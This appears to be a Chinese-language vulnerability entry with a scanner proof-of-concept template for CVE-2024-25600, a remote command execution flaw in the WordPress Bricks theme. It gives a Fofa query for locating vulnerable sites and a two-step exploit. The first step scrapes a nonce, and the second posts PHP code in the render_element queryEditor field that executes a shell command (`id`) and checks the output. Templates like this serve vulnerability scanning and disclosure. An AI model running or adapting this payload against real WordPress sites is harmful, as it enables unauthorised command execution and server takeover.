漏洞描述
Fofa: body="/wp-content/themes/bricks/"
CVE-2024-25600: WordPress的Bricks主题存在远程命令执行
PoC代码[已公开]
id: CVE-2024-25600
info:
name: WordPress的Bricks主题存在远程命令执行
author: zan8in
severity: critical
verified: true
description: |-
Fofa: body="/wp-content/themes/bricks/"
reference:
- https://mp.weixin.qq.com/s/F9qpmIW04cdmbzkY0KdSyg
tags: wordpress,cve,cve2024,rce
created: 2024/02/28
rules:
r0:
request:
method: GET
path: /
expression: response.body.bcontains(b'"nonce":')
output:
search: '"\"nonce\":\"(?P<nonce>.+?)\",".bsubmatch(response.body)'
nonce: search["nonce"]
r1:
request:
method: POST
path: /wp-json/bricks/v1/render_element
headers:
Content-Type: application/json
body: |
{
"postId": "1",
"nonce": "{{nonce}}",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()